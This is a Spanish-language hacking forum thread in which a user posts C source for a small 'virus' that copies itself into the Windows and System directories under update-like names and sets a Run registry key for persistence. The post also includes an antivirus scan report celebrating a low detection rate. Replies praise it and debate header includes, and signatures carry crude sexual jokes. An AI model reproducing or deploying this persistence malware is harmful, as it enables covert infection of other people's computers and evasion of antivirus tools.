Estaba estudiando un poco,y quise seguir mis primeros pasos en VB,uno de mis primeros tools en vb fue un MiniVirus similar a este...
Ahy les dejo el codigo en C,recuerden, no es malicioso,peor no lo pasen que esta feo...

Código: Seleccionar todo

#include <stdio.h>
#include <string.h>
#include <windows.h>
char WinDirec[260];
char SysDirec[260];
HKEY poison;
////////////////Agradecimientos a ps1c0s1s/////////////////////////
/////////////// c0d3d p0is0n-123//////////////////////////////////
int main(int argc, char *argv[])
{
GetWindowsDirectory(WinDirec,260);
strcat(WinDirec,"\\update.exe");     
CopyFile(argv[0],WinDirec,FALSE);
RegOpenKey("HKEY_CURRENT_USER","Software\\Microsoft\\Windows\\CurrentVersion\\Run",&poison);
RegSetValue(poison,"CSECTION",0,WinDirec,0);
RegCloseKey(poison);
GetSystemDirectory(SysDirec,sizeof(SysDirec));
strcat(SysDirec,"\\updt.exe");
CopyFile(argv[0],SysDirec,FALSE);
}
File Info

Report date: 2010-09-01 15:08:31 (GMT 1)
File name: virusprueba-exe
File size: 22720 bytes
MD5 Hash: dddd65390b935cfce77c20c253d94fb0
SHA1 Hash: 1eb9f7338c2022a9268be300d2125d36d64b77fe
Detection rate: 1 on 16 (6%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 - W32/Oficla.F.gen!Eldorado
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
[Enlace externo eliminado para invitados]

DP: Esa Mancha de F-PROT me da jordera ver en donde esta,pero de seguro salata por heuristica al ver el registro y el Copy....

Salu2
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
Blog: http://www.seginformatica.net
Twitter: https://twitter.com/#!/p0is0nseginf
gracias loco , a alguien seguro le interesa ;) y lo que me gusta de vos es que vos Si sos uno de lo que hace sus propias tools :) saludos
<Josh> y bueno hermano,tu hermana q me dijo q estaba cansada de tenerle el orto como la bandera de japon y bueno la pobre me quizo hacer un masaje prostatico nada mas pero era tanto su recelo y venganza acumulada q se esmero un poco mas de lo normal,pero bue,estuivo bien amorizado por la de dias horas años y lagrimas q echo la pobre de tanto culearla
Bien p0ison avansas muy rapido bro.....
Saludos!
obey escribió:Pues si tuviese mas edad todavia pero esqe perder la virginidad con tu profesora de informatica y que ademas tenga 50....
Muy bueno bro, pero recuerda que si utilizas strcat tienes que colocar el header string.h.

Bendiciones ¡!
¿Si usted muriera hoy esta seguro que iría al cielo?
http://www.antesdelfin.com/salvo.html

© Indetectables Team
DARK_J4V13R
Muy bueno bro, "pero recuerda que si utilizas strcat tienes que colocar el header string.h"

Bendiciones ¡!
a ver .. eso es como preguntar "si uso strcat tengo que colocar el header string.h si o si "?

y la respuesta seria , esa pregunta es un tanto... ejemplo , que sistema operativo usas ?
simplemente dime que SO usas y te digo como averiguar eso de cualquier funcion y libreria pero bueno , la respuesta es "formalmente si" o sea DARK_J4V13R es formalmente necesario, pero dependiendo de las circunstancias no tiene por que ser indispensable si usas los entornos de desarrollo de m$oft, tienen la mala costumbre de a veces incluir automáticamente ciertas cabeceras y es posible que string.h sea una de ellas si compilas sin el include y funciona, es culpa del compilador .

De toda forma esta bien lo de poison porque de todas forma la dejo incluida..

En fin el uso "formalmente si" pero no indispensable! saludos
<Josh> y bueno hermano,tu hermana q me dijo q estaba cansada de tenerle el orto como la bandera de japon y bueno la pobre me quizo hacer un masaje prostatico nada mas pero era tanto su recelo y venganza acumulada q se esmero un poco mas de lo normal,pero bue,estuivo bien amorizado por la de dias horas años y lagrimas q echo la pobre de tanto culearla
Responder

Volver a “Fuentes”